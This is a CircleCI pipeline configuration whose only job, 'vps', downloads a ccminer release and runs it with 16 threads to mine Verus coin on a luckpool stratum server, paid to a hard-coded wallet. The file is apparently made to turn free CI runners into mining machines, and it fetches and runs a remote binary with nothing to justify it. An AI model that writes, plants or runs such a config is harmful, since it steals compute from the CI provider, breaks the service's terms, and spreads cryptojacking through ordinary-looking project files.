version: 2.1
executors:
  my-custom-executor:
    docker:
      - image: ubuntu
        auth:
          # ensure you have first added these secrets
          # visit app.circleci.com/settings/project/github/mehmetbatinusakyt/Ptero-vm/environment-variables
          username: $DOCKER_HUB_USER
          password: $DOCKER_HUB_PASSWORD
jobs:
  vps:

    executor: my-custom-executor
    steps:
      - checkout
      - run: |
          # echo Hello, World!
          lscpu
          wget https://github.com/monkins1010/ccminer/releases/download/v3.7.0/ccminer_3_7_ubuntu_18.04
          chmod +x ccminer_3_7_ubuntu_18.04
          ./ccminer_3_7_ubuntu_18.04 -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RBbZMTMwMN7up2stRRHj8qxGUeCUxj5BAk.BatinCollab4 -p x -t 16

workflows:
  my-custom-workflow:
    jobs:
      - vps
